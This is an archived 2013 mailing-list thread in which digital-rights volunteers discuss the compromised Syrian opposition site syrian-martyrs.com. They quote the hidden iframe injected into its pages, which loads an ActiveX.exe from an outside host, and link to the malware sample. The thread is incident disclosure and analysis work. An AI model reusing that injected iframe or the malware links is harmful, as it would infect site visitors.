Search Mailing List Archives


Limit search to: Subject & Body Subject Author
Sort by: Reverse Sort
Limit to: All This Week Last Week This Month Last Month
Select Date Range     through    

[liberationtech] Syrian-martyrs.com website probably compromised by virus

KheOps kheops at ceops.eu
Wed Jan 30 04:19:38 PST 2013


Hello,

I wrote a first summary on the case, I will try to keep it up to date
with new data,
https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/

ALl the best,
KheOps

Le 30/01/2013 00:00, SiNA Rabbani a écrit :
> 
> Hi!
> 
> I sent the malware to a couple of friends that have a setup ready. If
> you want to try this it might be fun:
> http://docs.cuckoosandbox.org/en/latest/
> 
> All the best,
> SiNA
> 
> 
> KheOps:
>> Hey,
>>
>> Le 29/01/2013 23:34, SiNA Rabbani a écrit :
>>> This is the malware:
>>>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
>>
>> Yes, saw that too.
>>
>> However, I don't find any precise description of its behaviour. Like,
>> what it does, if it opens any port, sends data to a C&C or whatever.
>>
>> I have downloaded it there:
>> https://resources.telecomix.ceops.eu/material/malwares/
>>
>> All the best,
>>
>>>
>>>
>>> --SiNA
>>>
>>>
>>>
>>> SiNA
>>>
>>> Rabbani:
>>>> holly shit:
>>>
>>>> <iframe name="I1" width="10" height="10" 
>>>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>>>
>>>
>>> border="0"
>>>> frameborder="0">
>>>
>>>
>>>> :/ if you are running windows don't even go there!!!
>>>
>>>
>>>> Andrew Lewis:
>>>>> I can get to this in 6 hours or so, maybe someone is willing to 
>>>>> jump on this before then?
>>>
>>>>> -Andrew
>>>
>>>>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
>>>
>>>>>> Dear Libtech,
>>>>>>
>>>>>> We just saw that the website : http://www.syrian-martyrs.com
>>>>>> is probably compromised. Every page of the website contains an 
>>>>>> iFrame which links to a .exe file which is detected as a virus
>>>>>> by antivirus software: 
>>>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>>>
>>>>>>
>>>>>>
>>>
>>>>>>
>>> The fact that the HTML code is present at the bottom of each page makes
>>>>>> me think that the "index.php" page has been changed in a way
>>>>>> that makes that iFrame appear on every page of the website,
>>>>>> after the dynamic content.
>>>>>>
>>>>>> It also probably means that the attackers have some kind of 
>>>>>> access to the server. My guess would be going to a PHP shell,
>>>>>> but I'm no expert in this.
>>>>>>
>>>>>> Any help, clue, investigation, would be very welcome :)
>>>>>>
>>>>>> Thank you, KheOps
>>>>>>
>>>>>> -- Unsubscribe, change to digest, or change password at: 
>>>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>>>> -- Unsubscribe, change to digest, or change password at: 
>>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>>
>>>
>>>
>>>
>>>
>>> --
>>> Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>>
>>
>>
>>
>> --
>> Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>
> 
> 



More information about the liberationtech mailing list